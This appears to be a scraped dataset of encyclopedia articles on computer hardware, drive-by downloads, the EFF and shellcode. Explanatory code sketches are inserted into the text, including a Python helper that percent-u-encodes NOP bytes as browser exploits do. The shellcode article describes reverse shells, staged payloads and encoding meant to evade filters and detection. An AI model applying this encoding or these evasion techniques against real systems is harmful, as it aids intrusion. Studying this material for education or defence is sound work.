architecture that has served as the template for most modern computers. 11 Von Neumann's design featured a centralized memory that stored both data and programs, a central processing unit (CPU) with priority of access to the memory, and input and output (I O) units. 
Von Neumann used a single bus to transfer data, meaning that his solution to the storage problem by locating programs and data adjacent to each other created the Von Neumann bottleneck when the system tries to fetch both at the same time—often throttling the system's performance. 12 Computer architecture requires prioritizing between different goals, such as cost, speed, availability, and energy efficiency. The designer must have a good grasp of the hardware requirements and many different aspects of computing, from compilers to integrated circuit design. 14 Cost has also become a significant constraint for manufacturers seeking to sell their products for less money than competitors offering a very similar commodity. Profit margins have also been reduced. 15 Even when the performance is not increasing, the cost of components has been dropping over time due to improved manufacturing techniques that have fewer components rejected at quality assurance stage. 16 The most common instruction set architecture (ISA)—the interface between a computer's hardware and software—is based on the one devised by von Neumann in 1945. 17 Despite the separation of the computing unit and the I O system in many diagrams, typically the hardware is shared, with a bit in the computing unit indicating whether it is in computation or I O mode. 18 Common types of ISAs include CISC (complex instruction set computer), RISC (reduced instruction set computer), vector operations, and hybrid modes. 19 CISC involves using a larger expression set to minimize the number of instructions the machines need to use. 20 Based on a recognition that only a few instructions are commonly used, RISC shrinks the instruction set for added simplicity, which also enables the inclusion of more registers. 21 After the invention of RISC in the 1980s, RISC based architectures that used pipelining and caching to increase performance displaced CISC architectures, particularly in applications with restrictions on power usage or space (such as mobile phones). From 1986 to 2003, the annual rate of improvement in hardware performance exceeded 50 percent, enabling the development of new computing devices such as tablets and mobiles. 22 Alongside the density of transistors, DRAM memory as well as flash and magnetic disk storage also became exponentially more compact and cheaper. The rate of improvement slackened off in the twenty-first century. 23 In the twenty-first century, increases in performance have been driven by increasing exploitation of parallelism. 24 Applications are often parallelizable in two ways: either the same function is running across multiple areas of data (data parallelism) or different tasks can be performed simultaneously with limited interaction (task parallelism). 25 These forms of parallelism are accommodated by various hardware strategies, including instruction-level parallelism (such as instruction pipelining), vector architectures and graphical processing units (GPUs) that are able to implement data parallelism, thread-level parallelism and request-level parallelism (both implementing task-level parallelism). 25 Microarchitecture, also known as computer organization, refers to high-level hardware questions such as the design of the CPU, memory, and memory interconnect. 26 Memory hierarchy ensures that the memory quicker to access (and more expensive) is located closer to the CPU, while slower, cheaper memory for large-volume storage is located further away. 
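To illustrate the distinction drawn above between data parallelism and task parallelism, here is a small sketch using Python's standard concurrent.futures module; the scraped article is hardware-oriented and names no particular API, so the functions and numbers below are purely illustrative assumptions.
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor

def square(x):
    return x * x

if __name__ == "__main__":
    # Data parallelism: the same function applied across many pieces of data.
    with ProcessPoolExecutor() as pool:
        print(list(pool.map(square, range(8))))

    # Task parallelism: different, largely independent tasks run concurrently.
    with ThreadPoolExecutor() as pool:
        total = pool.submit(sum, range(1_000_000))
        ordered = pool.submit(sorted, [3, 1, 2])
        print(total.result(), ordered.result())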
27 Memory is typically segregated to separate programs from data and limit an attacker's ability to alter programs. 28 Most computers use virtual memory to simplify addressing for programs, using the operating system to map virtual memory to different areas of the finite physical memory. 29 Computer processors generate heat, and excessive heat impacts their performance and can harm the components. Many computer chips will automatically throttle their performance to avoid overheating. Computers also typically have mechanisms for dissipating excessive heat, such as air or liquid coolers for the CPU and GPU and heatsinks for other components, such as the RAM. Computer cases are also often ventilated to help dissipate heat from the computer. 30 Data centers typically use more sophisticated cooling solutions to keep the operating temperature of the entire center safe. Air-cooled systems are more common in smaller or older data centers, while liquid-cooled immersion (where each computer is surrounded by cooling fluid) and direct-to-chip (where the cooling fluid is directed to each computer chip) can be more expensive but are also more efficient. 31 Most computers are designed to be more powerful than their cooling system, but their sustained operations cannot exceed the capacity of the cooling system. 32 While performance can be temporarily increased when the computer is not hot (overclocking), 33 in order to protect the hardware from excessive heat, the system will automatically reduce performance or shut down the processor if necessary. 32 Processors also will shut off or enter a low power mode when inactive to reduce heat. 34 Power delivery as well as heat dissipation are the most challenging aspects of hardware design, 35 and have been the limiting factor to the development of smaller and faster chips since the early twenty-first century. 34 Increases in performance require a commensurate increase in energy use and cooling demand. 36 The personal computer is one of the most common types of computer due to its versatility and relatively low price. Virtual hardware is software that mimics the function of hardware; it is commonly used in infrastructure as a Service (IaaS) and platform as a Service (PaaS). 45 Embedded systems have the most variation in their processing power and cost: from an 8 bit processor that could cost less than USD$0.10, to higher-end processors capable of billions of operations per second and costing over USD$100. Cost is a particular concern with these systems, with designers often choosing the cheapest option that satisfies the performance requirements. 46 A computer case encloses most of the components of a desktop computer system. It provides mechanical support and protection for internal elements such as the motherboard, disk drives, and power supply, and controls and directs the flow of cooling air over internal components. The case is also part of the system to control electromagnetic interference radiated by the computer and protects internal parts from electrostatic discharge. Large tower cases provide space for multiple disk drives or other peripherals and usually stand on the floor, while desktop cases provide less expansion room. All-in-one style designs include a video display built into the same case. Portable and laptop computers require cases that provide impact protection for the unit. Hobbyists may decorate the cases with colored lights, paint, or other features, in an activity called case modding. 
Most personal computer power supply units meet the ATX standard and convert from alternating current (AC) at between 120 and 277 volts provided from a power outlet to direct current (DC) at a much lower voltage: typically 12, 5, or 3.3 volts. 47 The motherboard is the main component of a computer. It is a board with integrated circuitry that connects the other parts of the computer including the CPU, the RAM, the disk drives (CD, DVD, hard disk, or any others) as well as any peripherals connected via the ports or the expansion slots. The integrated circuit (IC) chips in a computer typically contain billions of tiny metal oxide semiconductor field-effect transistors (MOSFETs). 48 Components directly attached to or to part of the motherboard include: An expansion card in computing is a printed circuit board that can be inserted into an expansion slot of a computer motherboard or backplane to add functionality to a computer system via the expansion bus. Expansion cards can be used to obtain or expand on features not offered by the motherboard. citation needed Using expansion cards for a video processor used to be common, but modern computers are more likely to instead have a GPU integrated into the motherboard. 61 Most computers also have an external data bus to connect peripheral devices to the motherboard. Most commonly, Universal Serial Bus (USB) is used. 62 Unlike the internal bus, the external bus is connected using a bus controller that allows the peripheral system to operate at a different speed from the CPU. 62 Input and output devices are used to receive data from the external world or write data respectively. Common examples include keyboards and mice (input) and displays and printers (output). Network interface controllers are used to access the Internet. 63 USB ports also allow power to connected devices—a standard USB supplies power at 5 volts and up to 500 milliamps (2.5 watts), while powered USB ports with additional pins may allow the delivery of more power—up to 6 amps at 24v. 64 Global revenue from computer hardware in 2023 reached $705.17 billion. 65 Because computer parts contain hazardous materials, there is a growing movement to recycle old and outdated parts. 66 Computer hardware contain dangerous chemicals such as lead, mercury, nickel, and cadmium. According to the EPA these e-wastes have a harmful effect on the environment unless they are disposed of properly. Making hardware requires energy, and recycling parts will reduce air pollution, water pollution, as well as greenhouse gas emissions. 67 Disposing unauthorized computer equipment is in fact illegal. Legislation makes it mandatory to recycle computers through the government approved facilities. Recycling a computer can be made easier by taking out certain reusable parts. For example, the RAM, DVD drive, the graphics card, hard drive or SSD, and other similar removable parts can be reused. Many materials used in computer hardware can be recovered by recycling for use in future production. Reuse of tin, silicon, iron, aluminum, and a variety of plastics that are present in bulk in computers or other electronics can reduce the costs of constructing new systems. Components frequently contain copper, gold, tantalum, 68 69 silver, platinum, palladium, and lead as well as other valuable materials suitable for reclamation. 70 71 The central processing unit contains many toxic materials. It contains lead and chromium in the metal plates. 
Resistors, semiconductors, infrared detectors, stabilizers, cables, and wires contain cadmium. The circuit boards in a computer contain mercury and chromium. 72 When these types of materials and chemicals are disposed of improperly, they become hazardous to the environment. When e-waste byproducts leach into groundwater, are burned, or get mishandled during recycling, they cause harm. Health problems associated with such toxins include impaired mental development, cancer, and damage to the lungs, liver, and kidneys. 73 Computer components contain many toxic substances, like dioxins, polychlorinated biphenyls (PCBs), cadmium, chromium, radioactive isotopes and mercury. Circuit boards contain considerable quantities of lead-tin solders that are more likely to leach into groundwater or create air pollution due to incineration. 74 Recycling of computer hardware is considered environmentally friendly because it prevents hazardous waste, including heavy metals and carcinogens, from entering the atmosphere, landfill or waterways. While electronics make up only a small fraction of total waste generated, they are far more dangerous. There is stringent legislation designed to enforce and encourage the sustainable disposal of appliances, the most notable being the Waste Electrical and Electronic Equipment Directive of the European Union and the United States National Computer Recycling Act. 75 "E-cycling", the recycling of computer hardware, refers to the donation, reuse, shredding and general collection of used electronics. Generically, the term refers to the process of collecting, brokering, disassembling, repairing and recycling the components or metals contained in used or discarded electronic equipment, otherwise known as electronic waste (e-waste). "E-cyclable" items include, but are not limited to: televisions, computers, microwave ovens, vacuum cleaners, telephones and cellular phones, stereos, and VCRs and DVDs: just about anything that has a cord, light or takes some kind of battery. 76 Some companies, such as Dell and Apple, will recycle computers of their make or any other make. Otherwise, a computer can be donated to Computer Aid International, an organization that recycles and refurbishes old computers for hospitals, schools, universities, etc. 77 |
521 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Drive-by_download | In computer security, a drive-by download is the unintended download of software, typically malicious software. The term "drive-by download" usually refers to a download which was authorized by a user without understanding what is being downloaded, such as in the case of a Trojan horse. In other cases, the term may simply refer to a download which occurs without a user's knowledge. Common types of files distributed in drive-by download attacks include computer viruses, spyware, or crimeware. Drive-by downloads may happen when visiting a website, 1 opening an e-mail attachment or clicking a link, or clicking on a deceptive pop-up window: 2 by clicking on the window in the mistaken belief that, for example, an error report from the computer's operating system itself is being acknowledged or a seemingly innocuous advertisement pop-up is being dismissed. In such cases, the "supplier" may claim that the user "consented" to the download, although the user was in fact unaware of having started an unwanted or malicious software download. Similarly if a person is visiting a site with malicious content, the person may become victim to a drive-by download attack. That is, the malicious content may be able to exploit vulnerabilities in the browser or plugins to run malicious code without the user's knowledge. 3 A drive-by install (or installation) is a similar event. It refers to installation rather than download (though sometimes the two terms are used interchangeably). When creating a drive-by download, an attacker must first create their malicious content to perform the attack. With the rise in exploit packs that contain the vulnerabilities needed to carry out unauthorized drive-by download attacks, the skill level needed to perform this attack has been reduced. 3 The next step is to host the malicious content that the attacker wishes to distribute. One option is for the attacker to host the malicious content on their own server. However, because of the difficulty in directing users to a new page, it may also be hosted on a compromised legitimate website, or a legitimate website unknowingly distributing the attackers content through a third party service (e.g. an advertisement). When the content is loaded by the client, the attacker will analyze the fingerprint of the client in order to tailor the code to exploit vulnerabilities specific to that client. 4 Finally, the attacker exploits the necessary vulnerabilities to launch the drive-by download attack. Drive-by downloads usually use one of two strategies. The first strategy is exploiting API calls for various plugins. For example, the DownloadAndInstall API of the Sina ActiveX component did not properly check its parameters and allowed the downloading and execution of arbitrary files from the internet. The second strategy involves writing shellcode to memory, and then exploiting vulnerabilities in the web browser or plugin to divert the control flow of the program to the shell code. 4 After the shellcode has been executed, the attacker can perform further malicious activities. This often involves downloading and installing malware, but can be anything, including stealing information to send back to the attacker. 3 The attacker may also take measures to prevent detection throughout the attack. One method is to rely on the obfuscation of the malicious code. This can be done through the use of iframes. 
3 Another method is to encrypt the malicious code to prevent detection. Generally, the attacker encrypts the malicious code into a ciphertext, then includes the decryption method after the ciphertext. 4 Detection of drive-by download attacks is an active area of research. Some methods of detection involve anomaly detection, which tracks state changes on a user's computer system while the user visits a webpage. This involves monitoring the user's computer system for anomalous changes when a web page is rendered. Other methods of detection include detecting when malicious code (shellcode) is written to memory by an attacker's exploit. Another detection method is to make run-time environments that allow JavaScript code to run and track its behavior while it runs. Other detection methods include examining contents of HTML pages to identify features that can be used to identify malicious web pages, and using characteristics of web servers to determine if a page is malicious. 3 Some antivirus tools use static signatures to match patterns of malicious scripts, although these are not very effective because of obfuscation techniques. Detection is also possible by using low-interaction or high-interaction honeyclients. 4 Drive-by downloads can also be prevented from occurring by using script-blockers such as NoScript, which can easily be added to browsers such as Firefox. Using such a script-blocker, the user can disable all the scripts on a given webpage, and then selectively re-enable individual scripts on a one-by-one basis in order to determine which ones are truly necessary for webpage functionality. However, some script-blocking tools can have unintended consequences, such as breaking parts of other websites, so using them can be a balancing act. 5 A different form of prevention, known as "Cujo", is integrated into a web proxy, where it inspects web pages and blocks the delivery of malicious JavaScript code. 6 |
522 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Electronic_Frontier_Foundation | The Electronic Frontier Foundation (EFF) is an international non-profit digital rights group based in San Francisco, California. It was founded in 1990 to promote Internet civil liberties. It provides funds for legal defense in court, presents amicus curiae briefs, defends individuals and new technologies from what it considers abusive legal threats, works to expose government malfeasance, provides guidance to the government and courts, organizes political action and mass mailings, supports some new technologies which it believes preserve personal freedoms and online civil liberties, maintains a database and web sites of related news and information, monitors and challenges potential legislation that it believes would infringe on personal liberties and fair use, and solicits a list of what it considers are abusive patents with intentions to defeat those that it considers are without merit. The Electronic Frontier Foundation was formed in July 1990 by John Gilmore, John Perry Barlow and Mitch Kapor in response to a series of actions by law enforcement agencies that led them to conclude that the authorities were gravely uninformed about emerging forms of online communication, 1 unreliable source? and that there was a need for increased protection for Internet civil liberties. In April 1990, Barlow had been visited by a U.S. Federal Bureau of Investigation agent in relation to the theft and distribution of the source code for a series of Macintosh ROMs. Barlow described the visit as "complicated by the agent's fairly complete unfamiliarity with computer technology. I realized right away that before I could demonstrate my innocence, I would first have to explain to him what guilt might be. Barlow felt that his experience was symptomatic of a "great paroxysm of governmental confusion during which everyone's liberties would become at risk". 2 non-primary source needed Barlow posted an account of this experience to The WELL online community and was contacted by Mitch Kapor, who had had a similar experience. The pair agreed that there was a need to defend civil liberties on the Internet. Kapor agreed to fund any legal fees associated with such a defense and the pair contacted New York lawyers Rabinowitz, Boudin, Standard, Krinsky and Lieberman about defending several computer hackers from a Harper's magazine forum on computers and freedom who had been the target of Secret Service raids. 1 unreliable source? This generated a large amount of publicity which led to offers of financial support from John Gilmore and Steve Wozniak. Barlow and Kapor continued to research conflicts between the government and technology and in June 1990, Barlow posted online the influential article entitled "Crime Puzzlement" in which Barlow announced his and Kapor's plans to create an organization to "raise and disburse funds for education, lobbying, and litigation in the areas relating to digital speech and the extension of the Constitution into Cyberspace. 3 non-primary source needed This generated further reaction and support for the ideas of Barlow and Kapor. In late June, Barlow held a series of dinners in San Francisco with major figures in the computer industry to develop a coherent response to these perceived threats. Barlow considered that: "The actions of the FBI and Secret Service were symptoms of a growing social crisis: Future Shock. 
America was entering the Information Age with neither laws nor metaphors for the appropriate protection and conveyance of information itself. 4 non-primary source needed Barlow felt that to confront this a formal organization would be needed; he hired Cathy Cook as press coordinator, and began to set up what would become the Electronic Frontier Foundation. The Electronic Frontier Foundation was formally founded on July 10, 1990, by Kapor and Barlow, who very soon after elected Gilmore, Wozniak, and Stewart Brand to join them on the board of directors. 4 non-primary source needed Initial funding was provided by Kapor, Wozniak, and an anonymous benefactor. 5 non-primary source needed 6 unreliable source? In 1990, Mike Godwin joined the organization as its first staff counsel. Then in 1991, Esther Dyson and Jerry Berman joined the EFF board of directors. By 1992, Cliff Figallo became the director of the original office, and in December 1992, Jerry Berman became the acting executive director of the organization as a whole, based in a new second office. citation needed The creation of the organization was motivated by the massive search and seizure on Steve Jackson Games executed by the United States Secret Service early in 1990. Similar but officially unconnected law-enforcement raids were being conducted across the United States at about that time as part of a state federal task force called Operation Sundevil. GURPS Cyberpunk, one of the game company's projects, was mistakenly labeled as a handbook for computer crime, 7 non-primary source needed and the Secret Service raided the offices of Steve Jackson Games. The search warrant for the raid was deemed hastily issued, and the games company soon after claimed unauthorized access as well as tampering of their emails. While phone calls were protected by legislation, digital emails were an early concept and had not been considered to fall under the right to personal privacy. The Steve Jackson Games case was the EFF's first high-profile case, was the major rallying point around which the EFF began promoting computer- and Internet-related civil liberties. 8 failed verification The EFF's second big case was Bernstein v. United States led by Cindy Cohn, in which programmer and professor Daniel J. Bernstein sued the government for permission to publish his encryption software, Snuffle, and a paper describing it. More recently, the organization has been involved in defending Edward Felten, Jon Lech Johansen and Dmitry Sklyarov. 9 non-primary source needed The organization was originally located at Mitch Kapor's Kapor Enterprises offices in Boston. 10 By the fall of 1993, the main EFF offices were consolidated into a single office in Washington DC, 10 headed by Executive Director Jerry Berman. During this time, some of the EFF's attention focused on influencing national policy, 10 to the dislike of some of the members of the organization. 10 11 In 1994, Berman parted ways with the EFF and formed the Center for Democracy and Technology, 10 while Drew Taubman briefly took the reins as executive director. In 1995, under the auspices of Executive Director Lori Fena, after some downsizing and in an effort to regroup and refocus on their base of support, the organization moved offices to San Francisco, California. 10 11 There, it took up temporary residence at John Gilmore's Toad Hall, and soon afterward moved into the Hamm's Building at 1550 Bryant St. 
After Fena moved onto the EFF board of directors for a while, the organization was led briefly by Tara Lemmey, followed by Barry Steinhardt (who had come from the closely allied Technology and Liberty Program at the American Civil Liberties Union (ACLU), and eventually returned to the ACLU). Not long before EFF's move into new offices at 454 Shotwell St. in SF's Mission District, Mike Godwin departed, long-time Legal Director Shari Steele was appointed executive director, and staff attorney Cindy Cohn became the legal director. In the spring of 2006, the EFF announced the opening of an office again in Washington, D.C., with two new staff attorneys. 12 In 2012, the EFF began a fundraising campaign for the renovation of a building located at 815 Eddy Street in San Francisco, to serve as its new headquarters. 13 non-primary source needed The move was completed in April 2013. 14 non-primary source needed On April 1, 2015, Shari Steele stepped down as executive director. 15 non-primary source needed Cindy Cohn became the new executive director, Corynne McSherry became the legal director, and Kurt Opsahl became the general counsel. By the mid 1990s the EFF was becoming seriously concerned about the refusal of the US government to license any secure encryption product for export unless it utilized key recovery and claims that governments could not decrypt information when protected by Data Encryption Standard (DES), continuing even after the public breaking of the code in the first of the DES Challenges. They coordinated and supported the construction of the EFF DES cracker (nicknamed Deep Crack), using special purpose hardware and software and costing $210,000. 16 17 non-primary source needed This brought the record for breaking a message down to 56 hours on 17 July 1998 and to under 24 hours on 19 January 1999 (in conjunction with distributed.net). The EFF published the plans and source code for the cracker. 18 Within four years the Advanced Encryption Standard was standardized as a replacement for DES. 19 The EFF is a leading supporter of the Email Privacy Act. 20 non-primary source needed The EFF regularly brings and defends lawsuits at all levels of the US legal system in pursuit of its goals and objectives. The EFF has long taken a stance against strategic lawsuits against public participation (SLAPP) as attempts to stymie free speech and advocated for effective anti-SLAPP legislation. 21 failed verification 22 non-primary source needed Many of the most significant technology law cases have involved the EFF, including MGM Studios, Inc. v. Grokster, Ltd., Apple v. Does, and others. non-primary source needed The Patent Busting Project is an Electronic Frontier Foundation (EFF) initiative challenging patents that the organization describes as illegitimate and suppress innovation or limit online expression. The initiative launched on April 19, 2004, and involves two phases: documenting the damage caused by these patents, and submitting challenges to the United States Patent and Trademark Office. 23 The EFF has long been an advocate of paper audit trails for voting machines and testified in support of them after the 2004 United States presidential election. 24 Later, it funded the research of Hariprasad Vemuru who exposed vulnerabilities in a particular model. 25 Since 2008, the EFF has operated the Our Vote Live website and database. Staffed by hotline volunteers, it is designed to quickly document irregularities and instances of voter suppression as they occur on an election day. 
26 The EFF was active in the 2016 United States presidential election because of online phishing related to the controversy over fabrication of election results. J. Alex Halderman, a computer security professor at the University of Michigan, wrote an article published in Medium in 2016 stating that he thought it advisable to recount some of the election results from states such as Wisconsin, Michigan, and Pennsylvania, exclusively states Hillary Clinton lost. 27 In retaliation against Halderman, a hacker sent anti-Semitic and racist emails to students at the University of Michigan signed as if from Halderman. The EFF publicizes these controversies and promotes the reduction of online phishing. 28 In the spring of 2018, the EFF joined the Open Technology Institute (OTI), the Center for Democracy and Technology, the ACLU Foundation of Northern California and four academics in writing The Santa Clara Principles: On Transparency and Accountability in Content Moderation, a document that sets out guidelines for social networks. 29 Six months later, the same organizations sought the support of roughly 80 others, including Article 19, in calling for Facebook to adopt the Santa Clara Principles. 30 This was later updated with a request for Facebook to warn users who have interacted with sock puppet law enforcement accounts. 31 In 2019, the EFF and OTI delivered testimony about the Online Harms White Paper in the United Kingdom, commenting that several proposals to increase the regulation of social media were open to abuse. 32 Also in 2019, the EFF launched the website "TOSsed out" to document cases of moderation rules being applied inconsistently. 33 Cindy Cohn underscored the organization's commitment to upholding free speech online, writing that "once you've turned it on, whether through pressure or threats of lawsuits, the power to silence people doesn't just go in one direction." 34 In December 2022, the EFF and 56 other digital advocacy organizations called for internet infrastructure providers to stop policing the content of the websites they service. 35 The organizations argued that many providers can only moderate content by revoking access to an entire website, leaving end-users with little transparency or recourse. They expressed concern that governments may pressure infrastructure providers to deny service to opponents and marginalized groups, and that monopolistic infrastructure providers may take banned users offline altogether. The coalition believes that platforms and user-facing websites are better positioned as moderators, because they can remove specific content, sanction accounts granularly, and offer reasoning and appeals for moderation decisions. 36 37 The initiative was launched in the wake of Drop Kiwi Farms, a campaign that convinced several internet service providers and DDoS protection firms to revoke service to Kiwi Farms, a controversial forum. 38 After the forum returned behind an open-source bot detection tool, the EFF stopped classifying DDoS protection services as infrastructure, because such services do not determine whether a website stays online. 39 The EFF organizes two sets of awards to promote work in accordance with its goals and objectives. 
The EFF Awards, until 2022 called the EFF Pioneer Awards, are awarded annually to recognize individuals who in its opinion are "leaders who are extending freedom and innovation on the electronic frontier. 40 In 2017, the honorees were Chelsea Manning, Mike Masnick and Annie Game. 41 The EFF Cooperative Computing Awards are a series of four awards meant "to encourage ordinary Internet users to contribute to solving huge scientific problems", to be awarded to the first individual or group who discovers a prime number with a significant record number of decimal digits. The awards are funded by an anonymous donor. 42 The awards are: EFF publishes through several outlets such as the online periodical EFFector, 45 as well as its websites, blogs, and on social networking services. non-primary source needed EFF's first book was published in 1993 as The Big Dummy's Guide to the Internet, a beginners' how-to manual by contracted technical writer Adam Gaffin, and made available for free download in many formats. MIT Press published it in paperback form in 1994 as Everybody's Guide to the Internet (ISBN 9780262571050). The online edition was updated regularly throughout the 1990s and early 2000s, and translated into dozens of languages. non-primary source needed The organization's second book, Protecting Yourself Online (ISBN 9780062515124), an overview of digital civil liberties, was written in 1998 by technical writer Robert B. Gelman and EFF Communications Director Stanton McCandlish, and published by HarperCollins. non-primary source needed A third book, Cracking DES: Secrets of Encryption Research, Wiretap Politics Chip Design (ISBN 9781565925205), focusing on EFF's DES Cracker project, was published the same year by O'Reilly Media. non-primary source needed A digital book, Pwning Tomorrow, an anthology of speculative fiction, was produced in 2015 as part of EFF's 25th anniversary activities, and includes contributions from 22 writers, including Charlie Jane Anders, Paolo Bacigalupi, Lauren Beukes, David Brin, Pat Cadigan, Cory Doctorow, Neil Gaiman, Eileen Gunn, Kameron Hurley, James Patrick Kelly, Ramez Naam, Annalee Newitz, Hannu Rajaniemi, Rudy Rucker, Lewis Shiner, Bruce Sterling, and Charles Yu. 46 non-primary source needed The Electronic Frontier Foundation's blog, DeepLinks, is a major section of its main website at EFF.org. non-primary source needed The EFF sent a video message of support to global grassroots movement CryptoParty. 47 non-primary source needed EFF's How to Fix the Internet podcast won a 2024 Anthem Award. 48 The EFF has developed some software and browser add-ons, including Switzerland, HTTPS Everywhere, and Privacy Badger. citation needed The EFF conducted a project named Secure Messaging Scorecard which "evaluated apps and tools based on a set of seven specific criteria ranging from whether messages were encrypted in transit to whether or not the code had been recently audited. 49 non-primary source needed As of April 21, 2017 update , a revised version is under development. 49 non-primary source needed As of 2021, Charity Navigator has given the EFF an overall rating of four out of four stars, including four stars for its financial efficiency and capacity. 50 In 2011, the EFF received $1 million from Google as part of a settlement of a class action related to privacy issues involving Google Buzz. 
The Electronic Privacy Information Center and seven other privacy-focused nonprofits protested that the plaintiffs' lawyers and Google had, in effect, arranged to give the majority of those funds "to organizations that are currently paid by Google to lobby for or to consult for the company". An additional $1 million was obtained from Facebook in a similar settlement. 51 The agitprop art group Psychological Industries has independently issued, on behalf of the EFF, a series of buttons featuring pop culture tropes such as the logo of the Laughing Man from the anime series Ghost in the Shell: Stand Alone Complex (with the original The Catcher in the Rye quotation replaced with the slogan of Anonymous), a bleeding roller derby jammer, and the "We Can Do It!" woman (often misidentified as Rosie the Riveter). 52 In late June 2014, the EFF flew a GEFA-FLUG AS 105 GD 4 blimp, 53 owned by and flown in conjunction with Greenpeace, over the NSA's Bluffdale-based Utah Data Center in protest against its purported illegal spying. 54 |
525 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Shellcode | In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. 1 However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code. When creating shellcode, it is generally desirable to make it both small and executable, which allows it to be used in as wide a variety of situations as possible. 2 In assembly code, the same function can be performed in a multitude of ways and there is some variety in the lengths of opcodes that can be used for this purpose; good shellcode writers can put these small opcodes to use to create more compact shellcode. 3 Some have reached the smallest possible size while maintaining stability. 4 Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote). Local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability, for example a buffer overflow, in a higher-privileged process on that machine. If successfully executed, the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process. Remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on a local network, intranet, or a remote network. If successfully executed, the shellcode can provide the attacker access to the target machine across the network. Remote shellcodes normally use standard TCP IP socket connections to allow the attacker access to the shell on the target machine. Such shellcode can be categorized based on how this connection is set up: if the shellcode establishes the connection it is called a "reverse shell", or a connect-back shellcode because the shellcode connects back to the attacker's machine. On the other hand, if the attacker establishes the connection, the shellcode is called a bindshell because the shellcode binds to a certain port on the victim's machine. There's a peculiar shellcode named bindshell random port that skips the binding part and listens on a random port made available by the operating system. Because of that, the bindshell random port became the smallest stable bindshell shellcode for x86 64 available to this date. A third, much less common type, is socket-reuse shellcode. This type of shellcode is sometimes used when an exploit establishes a connection to the vulnerable process that is not closed before the shellcode is run. The shellcode can then re-use this connection to communicate with the attacker. Socket re-using shellcode is more elaborate, since the shellcode needs to find out which connection to re-use and the machine may have many connections open. 5 A firewall can be used to detect outgoing connections made by connect-back shellcode as well as incoming connections made by bindshells. They can, therefore, offer some protection against an attacker, even if the system is vulnerable, by preventing the attacker from connecting to the shell created by the shellcode. 
One reason why socket re-using shellcode is sometimes used is that it does not create new connections and, therefore, is harder to detect and block. Download and execute is a type of remote shellcode that downloads and executes some form of malware on the target system. This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, save it to disk and execute it. Nowadays, it is commonly used in drive-by download attacks, where a victim visits a malicious webpage that in turn attempts to run such a download and execute shellcode in order to install software on the victim's machine. A variation of this type of shellcode downloads and loads a library. 6 7 Advantages of this technique are that the code can be smaller, that it does not require the shellcode to spawn a new process on the target system, and that the shellcode does not need code to clean up the targeted process as this can be done by the library loaded into the process. When the amount of data that an attacker can inject into the target process is too limited to execute useful shellcode directly, it may be possible to execute it in stages. First, a small piece of shellcode (stage 1) is executed. This code then downloads a larger piece of shellcode (stage 2) into the process's memory and executes it. This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process's address space for the larger shellcode (the egg) and executes it. 8 This type of shellcode is similar to egg-hunt shellcode, but looks for multiple small blocks of data (eggs) and recombines them into one larger block (the omelette) that is subsequently executed. This is used when an attacker can only inject a number of small blocks of data into the process. 9 An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits. Because most processes filter or restrict the data that can be injected, shellcode often needs to be written to allow for these restrictions. This includes making the code small, null-free or alphanumeric. Various solutions have been found to get around such restrictions, including: Since intrusion detection can detect signatures of simple shellcodes being sent over the network, it is often encoded, made self-decrypting or polymorphic to avoid detection. Exploits that target browsers commonly encode shellcode in a JavaScript string using percent-encoding, escape sequence encoding uXXXX" or entity encoding. 10 Some exploits also obfuscate the encoded shellcode string further to prevent detection by IDS. For example, on the IA 32 architecture, here's how two NOP (no-operation) instructions would look, first unencoded: This instruction is used in NOP slides. 
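The percent-encoding mentioned above can be illustrated with a short Python sketch, Python being the language used elsewhere in this document. The %uXXXX form shown is the one historically consumed by JavaScript's unescape(); the byte values below are arbitrary placeholders for the example, not a working payload.

def percent_u_encode(payload: bytes) -> str:
    # Pack two bytes per %uXXXX unit, little-endian, matching how
    # unescape() rebuilds the bytes in memory as UTF-16 code units.
    if len(payload) % 2:
        payload += b"\x00"  # pad to an even length
    units = []
    for i in range(0, len(payload), 2):
        units.append("%%u%02X%02X" % (payload[i + 1], payload[i]))
    return "".join(units)

print(percent_u_encode(b"\x90\x90\xcc\xcc"))  # -> %u9090%uCCCC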
Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully. To produce null-free shellcode from shellcode that contains null bytes, one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA 32 architecture one could replace this instruction: which contains zeroes as part of the literal (1 expands to 0x00000001) with these instructions: which have the same effect but take fewer bytes to encode and are free of nulls. An alphanumeric shellcode is a shellcode that consists of or assembles itself on execution into entirely alphanumeric ASCII or Unicode characters such as 0 9, A Z and a z. 11 12 This type of encoding was created by hackers to hide working machine code inside what appears to be text. This can be useful to avoid detection of the code and to allow the code to pass through filters that scrub non-alphanumeric characters from strings (in part, such filters were a response to non-alphanumeric shellcode exploits). A similar type of encoding is called printable code and uses all printable characters (0 9, A Z, a z, () etc.). A similarly restricted variant is ECHOable code not containing any characters which are not accepted by the ECHO command. It has been shown that it is possible to create shellcode that looks like normal text in English. 13 Writing alphanumeric or printable code requires good understanding of the instruction set architecture of the machine(s) on which the code is to be executed. It has been demonstrated that it is possible to write alphanumeric code that is executable on more than one machine, 14 thereby constituting multi-architecture executable code. In certain circumstances, a target process will filter 